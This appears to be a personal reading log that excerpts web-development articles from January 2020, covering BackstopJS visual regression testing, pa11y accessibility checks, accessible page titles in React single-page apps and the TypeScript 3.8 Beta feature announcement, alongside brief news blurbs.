    Even if you're the only developer working on a project, it's still easy to make code changes that bleed into other areas of your application (I've been known to do that at times 😬). Visual regression testing can help stop that, and highlight any areas of your application that are visually different from before. BackstopJS is a good tool for running this, because it gives you starter config so you can hit the ground running. If you install backstop globally (npm install -g backstopjs), you can run their initialization command (backstop init) in your project folder and it'll create all the files for you, including the backstop.json config file.

    {
      "id": "backstop_default",
      "viewports": [
        { "label": "phone", "width": 320, "height": 480 },
        { "label": "tablet", "width": 1024, "height": 768 }
      ],
      "onBeforeScript": "puppet/onBefore.js",
      "onReadyScript": "puppet/onReady.js",
      "scenarios": [
        {
          "label": "BackstopJS Homepage",
          "cookiePath": "backstop_data/engine_scripts/cookies.json",
          "url": "http://localhost:65519",
          "referenceUrl": "",
          "readyEvent": "",
          "readySelector": "",
          "delay": 0,
          "hideSelectors": [],
          "removeSelectors": [],
          "hoverSelector": "",
          "clickSelector": "",
          "postInteractionWait": 0,
          "selectors": [],
          "selectorExpansion": true,
          "expect": 0,
          "misMatchThreshold": 0.1,
          "requireSameDimensions": true
        }
      ],
      "paths": {
        "bitmaps_reference": "backstop_data/bitmaps_reference",
        "bitmaps_test": "backstop_data/bitmaps_test",
        "engine_scripts": "backstop_data/engine_scripts",
        "html_report": "backstop_data/html_report",
        "ci_report": "backstop_data/ci_report"
      },
      "report": ["browser"],
      "engine": "puppeteer",
      "engineOptions": { "args": ["--no-sandbox"] },
      "asyncCaptureLimit": 5,
      "asyncCompareLimit": 50,
      "debug": false,
      "debugWindow": false
    }

    Again, if you're using WSL, add the executable path to the config options in backstop.json:

    "engine": "puppeteer",
    "engineOptions": {
      "args": ["--no-sandbox"],
      "executablePath": "/mnt/c/Program Files (x86)/Google/Chrome/Application/chrome.exe"
    },

    Run the test using the backstop test command and it will save the results in the backstop_data/bitmaps_test folder, under a separate folder for each test, and launch an HTML report with the results. The first time you run the test it will fail, as it doesn't have anything to compare against. Set the baseline screenshots by running backstop approve, then run the test again.

    Source: Getting Started with Front End Testing — JavaScript January
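
    The excerpt above starts mid-article and assumes a Puppeteer browser created earlier, so here is a self-contained sketch of a single pa11y run under the same assumptions (the port number is copied from the excerpt; pa11y and puppeteer installed locally):

    // Minimal single-page pa11y run, sharing one Puppeteer instance
    // the way the Promise.all example above does.
    const pa11y = require('pa11y');
    const puppeteer = require('puppeteer');

    (async () => {
      const browser = await puppeteer.launch();
      const results = await pa11y('http://localhost:65519', {
        browser: browser,
        standard: 'WCAG2AAA',
      });
      console.log(`${results.issues.length} accessibility issues found`);
      await browser.close();
    })();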

    Read at 03:37 am, Jan 23rd

  • The Most Recent Time I Sniped Myself

    Self-sniping is the biggest problem in the programming industry among people my age. In my day, you didn’t get this way without Needing To Know for no good reason.

    Read at 02:59 am, Jan 23rd

  • Accessible page title in a single-page React application | Hugo Giraudel

    January 15, 2020 · ~5 minutes

    Over the summer, we, at N26, got the company Temesis to audit the accessibility of our web application. As part of their comprehensive and exhaustive report, we learnt that we were not handling page titles properly. Traditionally, following a link causes the page to reload with the content of the new page. This makes it possible for screen-readers to pick up on the new page title and announce it. With single-page applications using a JavaScript-powered routing system, only the content of the page tends to be reloaded in order to improve the perceived performance of the page. In this article, I will share what I learnt from Temesis and how to make sure the title of your React SPAs is accessible to assistive technologies.

    Overview

    We will build a teeny-tiny React application with react-router and react-helmet. Our application will consist of: a top-level component rendering a navigation and the router; three different pages served under different paths; and a “page title announcer”, the core topic of our article. The main idea is that every page will define its own title. The page title announcer listens for page changes, stores the page title and renders it in a visually hidden paragraph which gets focused. This enables screen-readers to announce the new page title. You can already look at the code on CodeSandbox.

    Boilerplate code

    To begin with, let’s create our page components. Each page is simply a React component rendering a <h1> element, and a <title> element with react-helmet. Now, let’s create a top-level component which will handle the routing to these different pages. To keep it simple, let’s take it (almost) as is from the basic example of react-router. It consists of our <TitleAnnouncer> component (described in the next section), a navigation, and a router.

    Title announcer

    The last missing piece of the puzzle is the actual title announcer. It does a few things: It holds the page title in a local state. It renders said title in a visually hidden paragraph (here with the .sr-only class). It listens to Helmet data change to update the local state. It listens for page change to focus the hidden paragraph (hence the tabIndex={-1}).

    Wrapping up

    That is all that is needed to handle page titles in an accessible way in a single-page React application. The react-router and react-helmet libraries are not necessary either, and the same pattern should be applicable regardless of the library (or lack thereof) in use. Note that if you have a simple application and can guarantee there is always a relevant <h1> element (independently of loading states, query errors and such), another, possibly simpler solution arises. It should be possible to skip that hidden element altogether, and focus the <h1> element instead (still with tabIndex={-1}). This solution could not scale for us, as we have hundreds of sometimes complex and dynamic pages, some with a visible <h1> element, some with a hidden one, and so on. Feel free to play with the code on CodeSandbox.

    Source: Accessible page title in a single-page React application | Hugo Giraudel
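
    For reference, here is a stripped-down approximation of such a title announcer. It is a sketch, not the article's exact component: it reads document.title on route change instead of listening to Helmet's data-change event, and it assumes react-router-dom v5.1+ for the useLocation hook.

    import React, { useEffect, useRef, useState } from "react";
    import { useLocation } from "react-router-dom";

    const TitleAnnouncer = () => {
      const [title, setTitle] = useState("");
      const titleRef = useRef(null);
      const { pathname } = useLocation();

      // On every route change, pick up the title the new page has set and
      // move focus to the hidden paragraph so screen-readers announce it.
      useEffect(() => {
        setTitle(document.title);
        if (titleRef.current) titleRef.current.focus();
      }, [pathname]);

      return (
        <p tabIndex={-1} ref={titleRef} className="sr-only">
          {title}
        </p>
      );
    };

    export default TitleAnnouncer;

    Note that reading document.title directly can race with react-helmet's asynchronous title updates, which is presumably why the article listens to Helmet's data change instead.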

    Read at 02:58 am, Jan 23rd

Day of Jan 22nd, 2020

  • No state-owned internet in NY, for now: Cuomo vetoes bill to study state service in rural areas

    Story Highlights: The New York state Assembly proposed legislation in 2019 that would study a potential state-owned internet service for New York's rural areas. The service would be in addition to New York's Broadband for All program. Gov. Andrew Cuomo vetoed the bill in Dec. 2019.

    Read at 11:53 pm, Jan 22nd

  • The 100 Worst Ed-Tech Debacles of the Decade

    For the past ten years, I have written a lengthy year-end series, documenting some of the dominant narratives and trends in education technology. I think it is worthwhile, as the decade draws to a close, to review those stories and to see how much (or how little) things have changed.

    Read at 11:51 pm, Jan 22nd

  • Announcing TypeScript 3.8 Beta | TypeScript

    Announcing TypeScript 3.8 Beta

    Today we’re announcing the availability of TypeScript 3.8 Beta! This Beta release contains all the new features you should expect from TypeScript 3.8’s final release. To get started using the beta, you can get it through NuGet, or through npm with the following command:

    npm install typescript@beta

    You can also get editor support. TypeScript 3.8 brings a lot of new features, including new or upcoming ECMAScript standards features, new syntax for importing/exporting only types, and more.

    Type-Only Imports and Exports

    TypeScript reuses JavaScript’s import syntax in order to let us reference types. For instance, in the following example, we’re able to import doThing, which is a JavaScript value, along with Options, which is purely a TypeScript type.

    // ./foo.ts
    interface Options {
      // ...
    }
    export function doThing(options: Options) {
      // ...
    }

    // ./bar.ts
    import { doThing, Options } from "./foo.js";

    function doThingBetter(options: Options) {
      // do something twice as good
      doThing(options);
      doThing(options);
    }

    This is convenient because most of the time we don’t have to worry about what’s being imported – just that we’re importing something. Unfortunately, this only worked because of a feature called import elision. When TypeScript outputs JavaScript files, it sees that Options is only used as a type, and it automatically drops its import from the emitted JavaScript. Again, this behavior is usually great, but it causes some other problems.

    First of all, there are some places where it’s ambiguous whether a value or a type is being exported. For example, in the following example, is MyThing a value or a type?

    import { MyThing } from "./some-module.js";
    export { MyThing };

    Limiting ourselves to just this file, there’s no way to know. Both Babel and TypeScript’s transpileModule API will emit code that doesn’t work correctly if MyThing is only a type, and TypeScript’s isolatedModules flag will warn us that it’ll be a problem. The real problem here is that there’s no way to say “no, no, I really only meant the type – this should be erased”, so import elision isn’t good enough.

    The other issue was that TypeScript’s import elision would get rid of import statements that only contained imports used as types. That caused observably different behavior for modules that have side-effects, and so users would have to insert a second import statement purely to ensure side-effects.

    // This statement will get erased because of import elision.
    import { SomeTypeFoo, SomeOtherTypeBar } from "./module-with-side-effects";

    // This statement always sticks around.
    import "./module-with-side-effects";

    A concrete place where we saw this coming up was in frameworks like Angular.js (1.x), where services needed to be registered globally (which is a side-effect), but where those services were only imported for types.

    // ./service.ts
    export class Service {
      // ...
    }
    register("globalServiceId", Service);

    // ./consumer.ts
    import { Service } from "./service.js";

    inject("globalServiceId", function (service: Service) {
      // do stuff with Service
    });

    As a result, ./service.js will never get run, and things will break at runtime. To avoid this class of issues, we realized we needed to give users more fine-grained control over how things were getting imported/elided. As a solution in TypeScript 3.8, we’ve added a new syntax for type-only imports and exports.
    import type { SomeThing } from "./some-module.js";
    export type { SomeThing };

    import type only imports declarations to be used for type annotations and declarations. It always gets fully erased, so there’s no remnant of it at runtime. Similarly, export type only provides an export that can be used for type contexts, and is also erased from TypeScript’s output. It’s important to note that classes have a value at runtime and a type at design-time, and the use is very context-sensitive. When using import type to import a class, you can’t do things like extend from it.

    import type { Component } from "react";

    interface ButtonProps {
      // ...
    }

    class Button extends Component<ButtonProps> {
      //                 ~~~~~~~~~
      // error! 'Component' only refers to a type, but is being used as a value here.
      // ...
    }

    If you’ve used Flow before, the syntax is fairly similar. One difference is that we’ve added a few restrictions to avoid code that might appear ambiguous.

    // Is only 'Foo' a type? Or every declaration in the import?
    // We just give an error because it's not clear.
    import type Foo, { Bar, Baz } from "some-module";
    //     ~~~~~~~~~~~~~~~~~~~~~~
    // error! A type-only import can specify a default import or named bindings, but not both.

    In conjunction with import type, we’ve also added a new compiler flag to control what happens with imports that won’t be utilized at runtime: importsNotUsedAsValues. At this point the name is tentative, but this flag takes 3 different options:

    remove: this is today’s behavior of dropping these imports. It’s going to continue to be the default, and is a non-breaking change.
    preserve: this preserves all imports whose values are never used. This can cause imports/side-effects to be preserved.
    error: this preserves all imports (the same as the preserve option), but will error when a value import is only used as a type. This might be useful if you want to ensure no values are being accidentally imported, but still make side-effect imports explicit.

    For more information about the feature, you can take a look at the pull request.

    Type-Only vs Erased

    There is a final note about this feature. In TypeScript 3.8 Beta, only the type meaning of a declaration will be imported by import type. That means that you can’t use values even if they’re purely used for type positions (like in the extends clause of a class declared with the declare modifier, and the typeof type operator).

    import type { Base } from "my-library";

    let baseConstructor: typeof Base;
    //                          ~~~~
    // error! 'Base' only refers to a type, but is being used as a value here.

    declare class Derived extends Base {
      //                          ~~~~
      // error! 'Base' only refers to a type, but is being used as a value here.
    }

    We’re looking at changing this behavior based on recent feedback. Instead of only importing the type side of declarations, we’re planning on changing the meaning of import type to mean “import whatever this is, but only allow it in type positions.” In other words, things imported using import type can only be used in places where it won’t affect surrounding JavaScript code. While this behavior is not in the beta, you can expect it in our upcoming release candidate, and keep track of that work on its respective pull request.

    ECMAScript Private Fields

    TypeScript 3.8 brings support for ECMAScript’s private fields, part of the stage-3 class fields proposal. This work was started and driven to completion by our good friends at Bloomberg!
    class Person {
      #name: string;

      constructor(name: string) {
        this.#name = name;
      }

      greet() {
        console.log(`Hello, my name is ${this.#name}!`);
      }
    }

    let jeremy = new Person("Jeremy Bearimy");

    jeremy.#name
    //     ~~~~~
    // Property '#name' is not accessible outside class 'Person'
    // because it has a private identifier.

    Unlike regular properties (even ones declared with the private modifier), private fields have a few rules to keep in mind. Some of them are:

    Private fields start with a # character. Sometimes we call these private names.
    Every private field name is uniquely scoped to its containing class.
    TypeScript accessibility modifiers like public or private can’t be used on private fields.
    Private fields can’t be accessed or even detected outside of the containing class – even by JS users! Sometimes we call this hard privacy.

    Apart from “hard” privacy, another benefit of private fields is that uniqueness we just mentioned. For example, regular property declarations are prone to being overwritten in subclasses.

    class C {
      foo = 10;

      cHelper() {
        return this.foo;
      }
    }

    class D extends C {
      foo = 20;

      dHelper() {
        return this.foo;
      }
    }

    let instance = new D();

    // 'this.foo' refers to the same property on each instance.
    console.log(instance.cHelper()); // prints '20'
    console.log(instance.dHelper()); // prints '20'

    With private fields, you’ll never have to worry about this, since each field name is unique to the containing class.

    class C {
      #foo = 10;

      cHelper() {
        return this.#foo;
      }
    }

    class D extends C {
      #foo = 20;

      dHelper() {
        return this.#foo;
      }
    }

    let instance = new D();

    // 'this.#foo' refers to a different field within each class.
    console.log(instance.cHelper()); // prints '10'
    console.log(instance.dHelper()); // prints '20'

    Another thing worth noting is that accessing a private field on any other type will result in a TypeError!

    class Square {
      #sideLength: number;

      constructor(sideLength: number) {
        this.#sideLength = sideLength;
      }

      equals(other: any) {
        return this.#sideLength === other.#sideLength;
      }
    }

    const a = new Square(100);
    const b = { sideLength: 100 };

    // Boom!
    // TypeError: attempted to get private field on non-instance
    // This fails because 'b' is not an instance of 'Square'.
    console.log(a.equals(b));

    Finally, for any plain .js file users, private fields always have to be declared before they’re assigned to. JavaScript has always allowed users to access undeclared properties, whereas TypeScript has always required declarations for class properties. With private fields, declarations are always needed regardless of whether we’re working in .js or .ts files. For more information about the implementation, you can check out the original pull request.

    Which should I use?

    We’ve already received many questions on which type of privates you should use as a TypeScript user: most commonly, “should I use the private keyword, or ECMAScript’s hash/pound (#) private fields?” Like all good questions, the answer is not good: it depends!

    When it comes to properties, TypeScript’s private modifiers are fully erased – that means that while the data will be there, nothing is encoded in your JavaScript output about how the property was declared. At runtime, it acts entirely like a normal property. That means that when using the private keyword, privacy is only enforced at compile-time/design-time, and for JavaScript consumers, it’s entirely intent-based.

    class C {
      private foo = 10;
    }

    // This is an error at compile time,
    // but when TypeScript outputs .js files,
    // it'll run fine and print '10'.
    console.log(new C().foo); // prints '10'
    //                  ~~~
    // error! Property 'foo' is private and only accessible within class 'C'.

    // TypeScript allows this at compile-time
    // as a "work-around" to avoid the error.
    console.log(new C()["foo"]); // prints '10'

    The upside is that this sort of “soft privacy” can help your consumers temporarily work around not having access to some API, and works in any runtime. On the other hand, ECMAScript’s # privates are completely inaccessible outside of the class.

    class C {
      #foo = 10;
    }

    console.log(new C().#foo); // SyntaxError
    //                  ~~~~
    // TypeScript reports an error *and*
    // this won't work at runtime!

    console.log(new C()["#foo"]); // prints undefined
    //          ~~~~~~~~~~~~~~~
    // TypeScript reports an error under 'noImplicitAny',
    // and this prints 'undefined'.

    This hard privacy is really useful for strictly ensuring that nobody can make use of any of your internals. If you’re a library author, removing or renaming a private field should never cause a breaking change. As we mentioned, another benefit is that subclassing can be easier with ECMAScript’s # privates because they really are private. When using ECMAScript # private fields, no subclass ever has to worry about collisions in field naming. When it comes to TypeScript’s private property declarations, users still have to be careful not to trample over properties declared in superclasses.

    Finally, something to consider is where you intend for your code to run. TypeScript currently can’t support this feature unless targeting ECMAScript 2015 (ES6) targets or higher. This is because our downleveled implementation uses WeakMaps to enforce privacy, and WeakMaps can’t be polyfilled in a way that doesn’t cause memory leaks. In contrast, TypeScript’s private-declared properties work with all targets – even ECMAScript 3!

    Kudos!

    It’s worth reiterating how much work went into this feature from our contributors at Bloomberg. They were diligent in taking the time to learn to contribute features to the compiler/language service, and paid close attention to the ECMAScript specification to test that the feature was implemented in a compliant manner. They even improved another 3rd-party project, CLA Assistant, which made contributing to TypeScript even easier. We’d like to extend a special thanks to:

    export * as ns Syntax

    It’s common to have a single entry-point that exposes all the members of another module as a single member.

    import * as utilities from "./utilities.js";
    export { utilities };

    This is so common that ECMAScript 2020 recently added a new syntax to support this pattern!

    export * as utilities from "./utilities.js";

    This is a nice quality-of-life improvement to JavaScript, and TypeScript 3.8 implements this syntax. When your module target is earlier than es2020, TypeScript will output something along the lines of the first code snippet. Special thanks to community member Wenlu Wang (Kingwl), who implemented this feature! For more information, check out the original pull request.

    Top-Level await

    Most modern environments that provide I/O in JavaScript (like HTTP requests) are asynchronous, and many modern APIs return Promises. While this has a lot of benefits in making operations non-blocking, it makes certain things like loading files or external content surprisingly tedious. To avoid .then chains with Promises, JavaScript users often introduced an async function in order to use await, and then immediately called the function after defining it.
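
    Concretely, that "wrap it in an async function and call it immediately" pattern looks something like this (a minimal sketch; the URL is a placeholder):

    // Define an async function and invoke it immediately,
    // purely to get access to `await` inside the body.
    (async () => {
      const response = await fetch("https://example.com/data.json"); // placeholder URL
      const data = await response.json();
      console.log(data);
    })();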
    To avoid introducing an async function, we can use a handy upcoming ECMAScript feature called “top-level await”. Previously in JavaScript (along with most other languages with a similar feature), await was only allowed within the body of an async function. However, with top-level await, we can use await at the top level of a module.

    const response = await fetch("...");
    const greeting = await response.text();
    console.log(greeting);

    // Make sure we're a module
    export {};

    Note there’s a subtlety: top-level await only works at the top level of a module, and files are only considered modules when TypeScript finds an import or an export. In some basic cases, you might need to write out export {} as some boilerplate to make sure of this. Top-level await may not work in all the environments you might expect at this point. Currently, you can only use top-level await when the target compiler option is es2017 or above, and module is esnext or system. Support within several environments and bundlers may be limited or may require enabling experimental support. For more information on our implementation, you can check out the original pull request.

    es2020 for target and module

    Thanks to Kagami Sascha Rosylight (saschanaz), TypeScript 3.8 supports es2020 as an option for module and target. This will preserve newer ECMAScript 2020 features like optional chaining, nullish coalescing, export * as ns, and dynamic import(...) syntax. It also means bigint literals now have a stable target below esnext.

    TypeScript 3.8 supports JavaScript files by turning on the allowJs flag, and also supports type-checking those JavaScript files via the checkJs option or by adding a // @ts-check comment to the top of your .js files. Because JavaScript files don’t have dedicated syntax for type-checking, TypeScript leverages JSDoc. TypeScript 3.8 understands a few new JSDoc tags for properties. First are the accessibility modifiers: @public, @private, and @protected. These tags work exactly like public, private, and protected respectively work in TypeScript.

    @public is always implied and can be left off, but means that a property can be reached from anywhere.
    @private means that a property can only be used within the containing class.
    @protected means that a property can only be used within the containing class, and all derived subclasses, but not on dissimilar instances of the containing class.

    Next, we’ve also added the @readonly modifier to ensure that a property is only ever written to during initialization.

    watchOptions

    TypeScript has strived to provide reliable file-watching capabilities in --watch mode and in editors for years. While it’s worked well for the most part, it turns out that file-watching in Node.js is hard, and its drawbacks can be reflected in our logic. The built-in APIs in Node.js are either CPU/energy-intensive and inaccurate (fs.watchFile) or they’re wildly inconsistent across platforms (fs.watch). Additionally, it’s practically impossible to determine which API will work better, because it depends not only on the platform, but on the file system on which a file resides. This has been a struggle, because TypeScript needs to run on more platforms than just Node.js, and also strives to avoid dependencies in order to be entirely self-contained. This especially applies to dependencies on native Node.js modules.
    Because every project might work better under different strategies, TypeScript 3.8 introduces a new watchOptions field in tsconfig.json and jsconfig.json which allows users to tell the compiler/language service which watching strategies should be used to keep track of files and directories. watchOptions contains 4 new options that can be configured:

    watchFile: the strategy for how individual files are watched. This can be set to:
      fixedPollingInterval: Check every file for changes several times a second at a fixed interval.
      priorityPollingInterval: Check every file for changes several times a second, but use heuristics to check certain types of files less frequently than others.
      dynamicPriorityPolling: Use a dynamic queue where less-frequently modified files will be checked less often.
      useFsEvents (the default): Attempt to use the operating system/file system’s native events for file changes.
      useFsEventsOnParentDirectory: Attempt to use the operating system/file system’s native events to listen for changes on a file’s containing directories. This can use fewer file watchers, but might be less accurate.
    watchDirectory: the strategy for how entire directory trees are watched under systems that lack recursive file-watching functionality. This can be set to:
      fixedPollingInterval: Check every directory for changes several times a second at a fixed interval.
      dynamicPriorityPolling: Use a dynamic queue where less-frequently modified directories will be checked less often.
      useFsEvents (the default): Attempt to use the operating system/file system’s native events for directory changes.
    fallbackPolling: when using file system events, this option specifies the polling strategy that gets used when the system runs out of native file watchers and/or doesn’t support native file watchers. This can be set to:
      fixedPollingInterval: (See above.)
      priorityPollingInterval: (See above.)
      dynamicPriorityPolling: (See above.)
    synchronousWatchDirectory: Disable deferred watching on directories. Deferred watching is useful when lots of file changes might occur at once (e.g. a change in node_modules from running npm install), but you might want to disable it with this flag for some less-common setups.

    For more information on watchOptions, head over to GitHub to see the pull request.

    “Fast and Loose” Incremental Checking

    TypeScript’s --watch mode and --incremental mode can help tighten the feedback loop for projects. Turning on --incremental mode makes TypeScript keep track of which files can affect others, and on top of doing that, --watch mode keeps the compiler process open and reuses as much information in memory as possible. However, for much larger projects, even the dramatic gains in speed that these options afford us aren’t enough. For example, the Visual Studio Code team had built their own build tool around TypeScript called gulp-tsb, which would be less accurate in assessing which files needed to be rechecked/rebuilt in its watch mode and, as a result, could deliver drastically lower build times. Sacrificing accuracy for build speed, for better or worse, is a tradeoff many are willing to make in the TypeScript/JavaScript world. Lots of users prioritize tightening their iteration time over addressing the errors up-front. As an example, it’s fairly common to build code regardless of the results of type-checking or linting. TypeScript 3.8 introduces a new compiler option called assumeChangesOnlyAffectDirectDependencies.
    When this option is enabled, TypeScript will avoid rechecking/rebuilding all truly possibly-affected files, and will only recheck/rebuild files that have changed as well as files that directly import them. For example, consider a file fileD.ts that imports fileC.ts, which imports fileB.ts, which imports fileA.ts, as follows:

    fileA.ts <- fileB.ts <- fileC.ts <- fileD.ts

    In --watch mode, a change in fileA.ts would typically mean that TypeScript would need to at least re-check fileB.ts, fileC.ts, and fileD.ts. Under assumeChangesOnlyAffectDirectDependencies, a change in fileA.ts means that only fileA.ts and fileB.ts need to be re-checked. In a codebase like Visual Studio Code, this reduced rebuild times for changes in certain files from about 14 seconds to about 1 second. While we don’t necessarily recommend this option for all codebases, you might be interested if you have an extremely large codebase and are willing to defer full project errors until later (e.g. a dedicated build via a tsconfig.fullbuild.json or in CI). For more details, you can see the original pull request.

    Breaking Changes

    TypeScript 3.8 contains a few minor breaking changes that should be noted.

    Stricter Assignability Checks to Unions with Index Signatures

    Previously, excess properties were unchecked when assigning to unions where any type had an index signature – even if that excess property could never satisfy that index signature. In TypeScript 3.8, the type-checker is stricter, and only “exempts” properties from excess property checks if that property could plausibly satisfy an index signature.

    let obj1: { [x: string]: number } | { a: number };
    obj1 = { a: 5, c: 'abc' };
    //             ~
    // Error!
    // The type '{ [x: string]: number }' no longer exempts 'c'
    // from excess property checks on '{ a: number }'.

    let obj2: { [x: string]: number } | { [x: number]: number };
    obj2 = { a: 'abc' };
    //       ~
    // Error!
    // The types '{ [x: string]: number }' and '{ [x: number]: number }' no longer exempt 'a'
    // from excess property checks against '{ [x: number]: number }',
    // and it *is* sort of an excess property because 'a' isn't a numeric property name.
    // This one is more subtle.

    object in JSDoc is No Longer any Under noImplicitAny

    Historically, TypeScript’s support for checking JavaScript has been lax in certain ways in order to provide an approachable experience. For example, users often used Object in JSDoc to mean “some object, I dunno what”, and we’ve treated it as any. This is because treating it as TypeScript’s Object type would result in code reporting uninteresting errors, since the Object type is an extremely vague type with few capabilities other than methods like toString and valueOf. However, TypeScript does have a more useful type named object (notice that lowercase o). The object type is more restrictive than Object, in that it rejects all primitive types like string, boolean, and number. Unfortunately, both Object and object were treated as any in JSDoc. Because object can come in handy and is used significantly less than Object in JSDoc, we’ve removed the special-case behavior in JavaScript files when using noImplicitAny so that in JSDoc, the object type really refers to the non-primitive object type.

    What’s Next?

    Now that the beta is out, our team has been focusing largely on bug fixes and polish for what will eventually become TypeScript 3.8. As you can see on our current Iteration Plan, we’ll have one release candidate (a pre-release) in a couple of weeks, followed by a full release around mid-February.
As editor features we’ve developed become more mature, we’ll also show off functionality like Call Hierarchy and the “convert to template string” refactoring. If you’re able to give our beta a try, we would highly appreciate your feedback! So download it today, and happy hacking! – Daniel Rosenwasser and the TypeScript Team Source: Announcing TypeScript 3.8 Beta | TypeScript
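
    Circling back to the JSDoc property modifiers described in the post: they are explained in prose only, so here is a small sketch of how they behave in a checked JavaScript file. The Account class is hypothetical; it assumes checkJs or a // @ts-check comment, as described above.

    // @ts-check
    class Account {
      constructor() {
        /** @private */
        this.balance = 0;
        /** @readonly */
        this.id = "acct-1";
      }
    }

    const acct = new Account();
    console.log(acct.balance);
    // error! 'balance' is private and only accessible within class 'Account'.
    acct.id = "acct-2";
    // error! Cannot assign to 'id' because it is a read-only property.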

    Read at 01:35 pm, Jan 22nd